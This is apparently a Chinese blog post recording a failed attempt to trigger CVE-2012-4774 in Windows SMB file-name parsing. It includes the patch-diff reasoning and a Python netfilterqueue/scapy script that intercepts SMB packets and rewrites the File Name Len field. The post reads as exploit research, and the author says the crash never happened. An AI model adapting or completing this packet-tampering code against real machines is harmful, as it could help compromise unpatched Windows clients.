• CVE20124774不崩溃


    想让CVE-2012-4774崩溃下,然后继续调试崩溃,结果他丫就是不崩

    看了下,http://www.mcafee.com/us/resources/release-notes/foundstone/fsl_12_12_2012.pdf

    mcafee说CVE-2012-4774

    The flaw lies in the parsing of file names. Successful exploitation could allow an attacker to execute remote code. The exploit

    requires the user to browse a file system containing malicious files.

     

    补丁对比下,FindNextFileW存在问题

    新的补丁处增加了mov eax,206h,对SMB的File Name Len字段进行了判断,大致知道情况

    尝试为这个漏洞写了个修改数据包攻击的代码(samba目录下有个123命名的文件):

    '''
    
    please increase this in iptables
    
       iptables -I OUTPUT -d 192.168.0.0/24 -j NFQUEUE --queue-num 1
    
    '''
    
     
    
    from netfilterqueue import NetfilterQueue
    
    from scapy.all import *
    
     
    
    __vis_filter = """................................ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[.]^_`abcdefghijklmnopqrstuvwxyz{|}~..........
    
    ......................................................................................................................."""
    
     
    
    def hexdump(buf, length=16):
    
        """Return a hexdump output string of the given buffer."""
    
        n = 0
    
        res = []
    
        while buf:
    
            line, buf = buf[:length], buf[length:]
    
            hexa = ' '.join(['%02x' % ord(x) for x in line])
    
            line = line.translate(__vis_filter)
    
            res.append('  %04d:  %-*s %s' % (n, length * 3, hexa, line))
    
            n += length
    
        return '\n'.join(res)
    
        #return hexa
    
     
    
    def print_and_accept(pkt):
    
        data = hexdump(pkt.get_payload())
    
        print data
    
        pkt.accept()
    
     
    
    def process(payload):
    
        data = payload.get_payload()
    
        if data.find('\x06\x00\x00\x00') != -1 and len(data) == 408:
    
            data2 = data.replace(data[-40:-36],'\x58\x02\x00\x00')
    
            pkt = IP(data2)
    
            print hexdump(str(pkt))
    
            send(pkt,verbose=0)
    
            payload.drop()
    
        else:
    
            payload.accept()
    
        #payload.accept()
    
     
    
    def main():
    
        nfqueue = NetfilterQueue()
    
        nfqueue.bind(1, process)
    
        try:
    
            nfqueue.run()
    
        except KeyboardInterrupt:
    
            print "now exist"

    if __name__ == "__main__": main()

    结果杯具,没能成功崩溃,唉,继续探索

  • 相关阅读:
    面向对象编程
    json 和 pickle
    装饰器详解
    内置函数
    Python之基础知识
    Python之路---day2
    用户登录
    Python之路---day1
    js格式化数字和金额
    作用域链–JS基础核心之一
  • 原文地址:https://www.cnblogs.com/moonflow/p/2836470.html
Copyright © 2020-2023  润新知